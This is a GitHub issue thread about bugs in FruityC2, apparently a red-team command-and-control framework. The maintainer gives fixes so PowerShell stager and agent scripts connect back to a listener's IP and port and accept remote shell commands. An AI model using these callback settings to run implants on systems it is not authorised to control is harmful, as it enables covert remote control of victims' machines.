### ISSUE TITLE
Summary of minor issues

### ISSUE THREAD

**Issue by kleo** [xtr4nge/FruityC2#2]
Using Raspbian Jessie Lite, Raspberry Pi 3 as root user.

1. Win10 displays incorrectly in nodes view and displays Win7 instead.
2. Generated code and with listener enabled after selecting node, on Interact tab, entering commands on `Command >__` after payload injected to target and connect back to FruityC2 does not work, I have tried all demo commands after every command output `[*] set command: shell ipconfig`. Using powershell-command payload and listener on the same local network using eth0, set FruityC2 host IP port 4444.

```
[NEW BEACON STAGER]
UUID: 1484899487
VERSION: Microsoft Windows 10 Home Single Language

[SET-TASK]
UUID: 1484899487
COMMAND: shell ipconfig
```

3. Generated powershell payload and injected to target after connect back and trying to interact, the same result with 2. 

```
[NEW BEACON STAGER]
UUID: 1484900477
VERSION: Microsoft Windows 10 Home Single Language

[SET-TASK]
UUID: 1484900477
COMMAND: shell ipconfig
```
recurring powershell output
```
Get-Data ERROR.
[BOT ERROR]
```

**Comment by xtr4nge** [comment]
Hi kbeflo, thanks for reporting the issue and welcome to the project.

About issue 1, the Win7 name on nodes view is a fixed value that I need to change. (all OS are displayed as Win7) I will fix that ;)

About issue 2 and 3:
Could you please run manually `ps_agent.ps1` script on the Win10 box. (You can find the script in `FruityC2/agent/`)

`ps_agent.ps1` can be executed without the stager, but you need to uncomment and change the last line: `Invoke-FruityC2 -r_server "x.x.x.x" -r_port "xx"`
Just change r_server and r_port for FruityC2 Listener IP/PORT

At the moment the stager and the agent have a lot of debug output, that will help us to identify the problem.

Thanks ;)

**Comment by xtr4nge** [comment]
Hi kbeflo,
I found the problem, r_port is missing from the stager, so it is just working with a listener on port 80.

Change line 130 of the stager: (FruityC2/agent/ps_stager.ps1)
`Invoke-FruityC2 -path_get $path_get -path_post $path_post -jitter $jitter -stime $stime -UA $UA -stager $false -r_server $r_server -target $TARGET`
to
`Invoke-FruityC2 -path_get $path_get -path_post $path_post -jitter $jitter -stime $stime -UA $UA -stager $false -r_server $r_server -r_port $r_port -target $TARGET`

That should solve the issue, I will add the change to the repository.
Thanks for reporting the problem.

regards,

**Comment by xtr4nge** [comment]
Hi kbeflo,
Issues 1, 2 and 3 have been fixed on FruityC2 v0.2

Thanks and regards
